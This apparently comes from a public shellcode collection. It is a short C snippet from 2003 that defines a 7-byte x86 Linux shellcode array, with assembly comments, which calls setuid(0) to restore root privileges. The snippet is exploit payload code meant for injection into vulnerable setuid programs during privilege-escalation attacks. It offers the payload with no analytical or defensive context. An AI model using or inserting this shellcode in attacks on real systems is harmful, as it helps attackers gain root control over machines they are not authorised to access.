Code that attempts to restore root privileges.
5003f212fcd49a9b5b28e29825d3e9d16357bd5435a2f33fd2e63e05acc535de
/* Copyright (c) Ramon de Carvalho Valle July 2003 */
/* x86/linux setuidcode */
char setuidcode[]= /* 7 bytes */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x6a\x17" /* pushl $0x17 */
"\x58" /* popl %eax */
"\xcd\x80" /* int $0x80 */
;